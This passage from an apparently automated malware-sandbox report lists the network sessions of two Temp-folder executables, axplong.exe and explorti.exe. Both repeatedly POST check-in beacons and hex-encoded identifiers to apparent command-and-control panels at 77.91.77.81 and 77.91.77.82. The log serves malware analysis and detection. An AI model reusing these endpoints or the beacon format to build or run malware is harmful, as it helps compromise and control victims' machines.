                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        73192.168.2.64991477.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:47.624895096 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:48.325628042 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:48.327037096 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:48.553669930 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        74192.168.2.64991577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:48.673949003 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:49.371473074 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:49.374104977 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:49.595944881 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        75192.168.2.64991677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:48.705473900 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:49.396188974 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:49.396836996 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:49.615955114 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        76192.168.2.64991777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:49.713315010 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:50.417373896 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:50.418100119 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:50.659898043 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        77192.168.2.64991877.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:49.731014967 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:50.434390068 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:50.435009956 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:50.660219908 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        78192.168.2.64992077.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:50.781033039 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:51.486740112 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:51.494256020 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:52.055315971 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        79192.168.2.64991977.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:50.781131029 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:51.497776985 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:51.499598980 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:51.723881006 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        80192.168.2.64992177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:51.845911980 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:52.756603003 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:52.757504940 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:52.760337114 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:52.982474089 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        81192.168.2.64992277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:52.179584026 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:52.865339041 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:52.868169069 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:53.084892035 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        82192.168.2.64992377.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:53.104219913 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:53.802973032 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:53 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:53.803733110 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:15:54.371777058 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:54 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        83192.168.2.64992477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:53.194562912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:53.930089951 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:53 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:53.930911064 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
